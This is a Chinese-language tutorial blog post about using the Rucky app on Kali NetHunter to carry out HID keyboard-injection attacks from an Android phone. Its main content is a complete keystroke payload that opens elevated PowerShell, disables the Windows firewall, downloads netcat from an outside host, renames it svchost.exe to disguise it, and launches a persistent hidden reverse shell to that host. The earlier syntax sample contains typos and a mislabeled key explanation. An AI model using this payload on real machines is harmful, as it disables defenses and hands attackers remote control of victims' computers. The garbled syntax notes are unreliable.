NetHunter使用Rucky实现HID键盘数据模拟攻击

发布时间 2023-06-04 15:03:49作者: Junglezt

知识概要:

  • NetHunter:是Kali Linux推出的移动Android端的系统
  • Rucky:是一种基于 HID 设备的攻击工具,其本质是一个可编程的键盘模拟器,可以用于快速执行各种攻击,例如在目标计算机上执行特定的命令、窃取密码等。
  • HID:是指人体接口设备,常见的 HID 包括键盘、鼠标、摄像头等 USB 设备。攻击者可以在 HID 设备上植入恶意代码,然后通过连接该设备到计算机,让计算机误认为该 HID 设备是一个普通的键盘或鼠标,并执行隐藏的恶意操作

首先你的Android设备需要拥有ROOT权限访问你的硬件借口,第二是你的USB数据口需要你的内核开放HID攻击的功能,刷入Nethunter的内核是支持的,如果需要刷入NetHunter可以查看我之前刷入NetHunter的文档

好的这里我们开始实验,可以在NetHunter商店中下载Rucky,可以在Github中下载比较新的版本: https://github.com/mayankmetha/Rucky

如果想要深入的了解可以如查阅Rucky语法的相关资料,基本的语法就是

DELAY 2000
GUI r
SIRING cmd
ENTER
DELAY 2000
SIRING whoami

例如上述:

  • DELAY 2000: 2000表示需要等待2秒
  • GUI r: GUI键盘上的Win键,r表示输入r
  • SIRING : 往窗口输入字符cmd
  • cmd: 模拟键盘摁下ENTER回车键

所以上述脚本就是会打开cmd窗口,然后执行whoami命令

例如下方下载nc.exe,然后使用`nc.exe`反弹shell的脚本

DELAY 2000
GUI  r
DELAY 300
STRING powershell 
CTRL SHIFT ENTER
DELAY 2000

STRING netsh advfirewall set allprofiles state off 
ENTER 
DELAY 800
STRING exit
ENTER
DELAY 1000


GUI r
DELAY 1000

STRING cmd
ENTER
DELAY 1000

STRING echo (wget 'http://192.168.122.222:8080/nc.exe' -OutFile svchost.exe) > b.ps1
ENTER
DELAY 1000
STRING powershell -ExecutionPolicy ByPass -File b.ps1
ENTER
DELAY 3000

STRING echo while($true){./svchost.exe 192.168.122.222 443 -e cmd.exe -d} > c.ps1
ENTER
DELAY 1000

STRING start /min powershell -ExecutionPolicy ByPass -File c.ps1 & exit
DELAY 1000
ENTER